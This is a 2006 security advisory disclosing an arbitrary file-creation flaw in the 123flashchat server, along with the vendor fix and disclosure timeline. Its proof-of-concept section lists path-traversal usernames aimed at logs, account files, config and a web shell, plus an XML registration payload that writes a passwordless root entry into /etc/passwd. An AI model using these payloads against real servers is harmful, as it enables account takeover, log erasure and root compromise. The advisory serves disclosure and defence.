[ISecAuditors Advisories] Arbitrary remote file creation in 123flashchat server
=============================================
INTERNET SECURITY AUDITORS ALERT 2006-001
- Original release date: January 09, 2006
- Last revised: January 13, 2006
- Discovered by: Jesus Olmos Gonzalez
- Severity: 4/5
=============================================
I. VULNERABILITY
-------------------------
Arbitrary remote file creation in 123flashchat server.
II. BACKGROUND
-------------------------
123 Flash Chat is a full featured java chat server and flash chat
client, the product homepage is www.123flashchat.com and it is
possible to test it at:
http://host10.123flaschat.com/123flaschat.swf
http://www.123flashchat.com/123flashchat.swf
III. DESCRIPTION
-------------------------
The chat server has a user-register functionality, that can be enabled
by the following sentence:
<enable-user-register>On</enable-user-register>
in /server/etc/groups/default.xml
By default it is enabled and anybody can create a chat account.
The register form ask the following questions:
username, password, repeat-password and email.
When a user creates an account, a file is created at members directory:
/123flashchat/server/data/default/members/isec-user
The user file has the following structure:
^@^B^@^<username>^@^V<password>^@^E<email>
or
^@^B^@^<username>^@^V<password>^@^@
allow
field size null parse example
username 32 no (allow transversal ../) ../room_1.txt
password 32 no allow all 123
repeat-pass 32 no allow all 123
email 128 yes /^.+@.+\..+$/aa a@xxx
Username field allow anybody to create a file in our system, with same
priviledges as the server and almost arbitrary content.
This is dangerous becouse, a user can get others account, erase logs,
modify the server's /etc/passwd or modify other config files.
IV. PROOF OF CONCEPT
-------------------------
In the exploitation, there are two factors, WHERE and WHAT.
The username vector is WHERE, and WHAT can be:
1) password
2) email address if we need more bytes
Possible attacs:
../../../../logs/access.log erase logs.
../../../../logs/error.log erase logs.
../default/logs/access.log erase logs.
../members/parker change parker's password, if now we
login with parker user, he will be
disconected.
../../../../../../../etc/passwd if server run as root.
../../../../etc/ssh/sshd.conf if server run as root.
../../../../../var/log/messages if server run as root.
../../../../var/www/htdocs/x.php try to build a shell.
../../../etc/groups/default.xml create an admin account by or other
config settings.
../../../fcserver.sh try to replace the script.
etc.
It is possible to replace the existent files, to make a DoS, to erase
logs, to create/change system accounts, to get other chat user/admin
accounts or to make other effects in server's system.
*Possible* remote execution if some config file is modified.
Is it possible to hijack and modify the raw command, to inyect line
feed (0x0a) or other characters to construct arbitrary content of the
created/overwrited file.
Example:
<?xml version="1.0" encoding="UTF-8"?>
<Register email="" passwd="(0x0a)root::0:0:root:/bin/bash(0x0a)"
user="../../../../../../../etc/passwd" />(0x0a)
/etc/passwd will be:
\0\2\0\3../../../../../../../etc/passwd\0\3
root::0:0:root:/bin/bash
\0\0
If the server is Windows, is it possible to get execution.
V. BUSINESS IMPACT
-------------------------
The chat service can be crashed or compromissed remotelly.
VI. SYSTEMS AFFECTED
-------------------------
This vulnerability affects the 123flaschat server up to 5.1 (released
on Dec 22, 2005)
tested at:
123flaschat server 5.1
123flaschat server 5.0
VII. SOLUTION
-------------------------
The vendor released the 5.1_2 version.
http://www.123flashchat.com/flash-chat-server-v512.html
VIII. REFERENCES
-------------------------
-
IX. CREDITS
-------------------------
This vulnerability has been discovered and reported by Jesus Olmos
Gonzalez (jolmos=at=isecauditors=dot=com).
X. REVISION HISTORY
-------------------------
January 09, 2006: Initial release.
January 13, 2006: Vendor response actualization.
XI. DISCLOSURE TIMELINE
-------------------------
January 04, 2006 The vulnerability discovered by Internet Security
Auditors (http://www.isecauditors.com)
January 09, 2006 Initial vendor notification sent.
January 10, 2006 Quick response, Version 5.1_2 was released.
XII. LEGAL NOTICES
-------------------------
-